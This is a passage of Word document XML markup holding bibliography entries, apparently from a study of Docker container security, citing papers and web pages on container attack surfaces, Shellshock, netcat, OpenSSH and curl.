                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4E33BEC9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Sultan, I. Ahmad and T. Dimitriou, “Container Security: Issues, Challenges, and the Road Ahead,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">IEEE Access, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 7, pp. 52976-52996, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="17670B56" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="35078089" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[75] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7BDAE3EE" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. P. Mullinix, E. Konomi, R. Davis and e. al, “On Security Measures for Containerized Applications Imaged with Docker,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">arXiv preprint arXiv:2008.04814, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2C0CC163" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="672AAF0B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[76] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6B8A19CD" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">K. Brady, S. Moon, T. Nguyen and e. al, “Docker Container Security in Cloud Computing,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2020 10th Annual Computing and Communication Workshop and Conference, CCWC 2020, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 975-980, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2616709F" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0063CCCF" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[77] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0FB4CC83" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Tomar, D. Jeena, P. Mishra and e. al, “Docker security: A threat model, attack taxonomy and real-time attack scenario of DoS,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings of the Confluence 2020 - 10th International Conference on Cloud Computing, Data Science and Engineering, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 150-155, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="1F6A6038" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="45EB39FE" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[78] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6C1C9418" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. A. Mohallel, J. M. Bass and A. Dehghantaha, “Experimenting with Docker: Linux Container and base OS attack surfaces,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">International Conference on Information Society, i-Society 2016, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 17-21, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="31C19F06" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4EFA15CA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[79] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6B22D13A" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">J. Wenhao and L. Zheng, “Vulnerability Analysis and Security Research of Docker Container,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2020 IEEE 3rd International Conference on Information Systems and Computer Aided Education (ICISCAE), </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 354-357, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="5D8F8EE2" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6BFE73E1" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[80] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1BB0829D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>BRM, “Positivism Research Philosophy,” Business Research Methodology, [Online]. Available: https://research-methodology.net/research-philosophy/positivism/. [Accessed 19 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="71E82188" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="676969BD" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[81] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="520A583E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Melnikovas, “Towards an Explicit Research Methodology: Adapting Research Onion Model for Futures Studies,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Journal of Futures Studies, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 23, no. 2, pp. 29-44, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="0619EF5B" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="715B4488" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[82] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5561056C" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">P. K. Overmars, P. H. Verburg and Veldkamp, “Comparison of a deductive and an inductive approach to specify land suitability in a spatially explicit land use model,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Land Use Policy, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 24, no. 3, pp. 584-599, 2007. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="715F4F8E" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2C0037D9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[83] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1F6B45BE" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>C. Pontikis, “How to setup a workstation computer with Debian Wheezy and XFCE4,” 24 August 2014. [Online]. Available: https://www.pontikis.net/blog/workstation-setup-debian-wheezy-xfce4. [Accessed 21 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="406FCFEA" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="707BEA00" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[84] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5CCD0619" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“Alpine Linux,” Alpine Linux, [Online]. Available: https://www.alpinelinux.org/. [Accessed 24 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="7C0E168A" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1C880DE4" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[85] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2A899B0D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">C. Mary, “Shellshock attack on linux systems--bash,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">International Research Journal of Engineering and Technology, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 2, no. 8, pp. 1322-1325, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="62B627B2" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="43839DA6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[86] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2B43CA57" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>J. Petters, “How to Use Netcat Commands: Examples and Cheat Sheets,” 25 March 2021. [Online]. Available: https://www.varonis.com/blog/netcat-commands/. [Accessed 23 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="219B4655" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="011DCB6F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[87] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6F1206C9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>ubuntu, “OpenSSH Server,” ubuntu, [Online]. Available: https://ubuntu.com/server/docs/service-openssh. [Accessed 28 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="39BA901D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5CE5ECE4" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[88] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7BBDC1A3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“docker-openssh-server,” [Online]. Available: https://github.com/linuxserver/docker-openssh-server. [Accessed 28 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3614C0FE" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="453772CA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[89] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7B3B8971" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“Apache Tutorial: Dynamic Content with CGI,” [Online]. Available: https://httpd.apache.org/docs/2.4/howto/cgi.html. [Accessed 28 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4DEE353B" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="553C9D60" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[90] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="116E4232" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“curl,” [Online]. Available: https://curl.se/. [Accessed 28 August 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3C404FC2" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="467CF3B2" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[91] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="429DD6A5" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>B Doerrfeld, “10+ top open-source tools for Docker security,” TechBeacon, [Online]. Available: https://techbeacon.com/security/10-top-open-source-tools-docker-security. [Accessed 2 September 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
            </w:tbl>
            <w:p w14:paraId="0A409AD3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
              <w:pPr>
                <w:divId w:val="1437796017"/>
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
            </w:p>
            <w:p w14:paraId="7FD54861" w14:textId="208BAA80" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
              <w:r>
                <w:rPr>
                  <w:b/>
